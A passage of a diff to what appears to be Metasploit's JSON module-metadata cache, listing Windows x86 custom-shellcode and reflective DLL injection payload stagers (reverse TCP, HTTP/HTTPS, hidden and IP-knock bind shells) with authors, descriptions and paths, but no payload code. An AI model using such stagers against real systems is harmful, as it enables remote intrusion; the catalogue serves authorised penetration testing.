"spoonm " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/custom/reverse_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager", + "fullname": "payload/windows/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/custom/reverse_tcp_allports": { + "name": "Windows shellcode stage, Reverse All-Port TCP Stager", + "fullname": "payload/windows/custom/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/custom/reverse_tcp_dns": { + "name": "Windows shellcode stage, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/custom/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/custom/reverse_tcp_rc4": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/custom/reverse_tcp_rc4_dns": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/custom/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/custom/reverse_tcp_uuid": { + "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/custom/reverse_udp": { + "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/custom/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "RageLtMan " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/custom/reverse_winhttp": { + "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/custom/reverse_winhttps": { + "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_windows/dllinject/bind_hidden_ipknock_tcp": { + "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/dllinject/bind_hidden_tcp": { + "name": "Reflective DLL Injection, Hidden Bind TCP Stager", + "fullname": "payload/windows/dllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/dllinject/bind_ipv6_tcp": { + "name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/dllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/dllinject/bind_ipv6_tcp_uuid": { + "name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/dllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/dllinject/bind_named_pipe": { + "name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/dllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/dllinject/bind_nonx_tcp": { + "name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/dllinject/bind_tcp": { + "name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/dllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/dllinject/bind_tcp_rc4": { + "name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/dllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/dllinject/bind_tcp_uuid": { + "name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/dllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/dllinject/find_tag": { + "name": "Reflective DLL Injection, Find Tag Ordinal Stager", + "fullname": "payload/windows/dllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/dllinject/reverse_http": { + "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/dllinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/dllinject/reverse_http_proxy_pstore": { + "name": "Reflective DLL Injection, Reverse HTTP Stager Proxy", + "fullname": "payload/windows/dllinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/dllinject/reverse_ipv6_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/dllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/dllinject/reverse_nonx_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/dllinject/reverse_ord_tcp": { + "name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/dllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "spoonm " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/dllinject/reverse_tcp": { + "name": "Reflective DLL Injection, Reverse TCP Stager", + "fullname": "payload/windows/dllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/dllinject/reverse_tcp_allports": { + "name": "Reflective DLL Injection, Reverse All-Port TCP Stager", + "fullname": "payload/windows/dllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/dllinject/reverse_tcp_dns": { + "name": "Reflective DLL Injection, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/dllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/dllinject/reverse_tcp_rc4": { + "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/dllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/dllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/dllinject/reverse_tcp_rc4_dns": { + "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/dllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a DLL via a 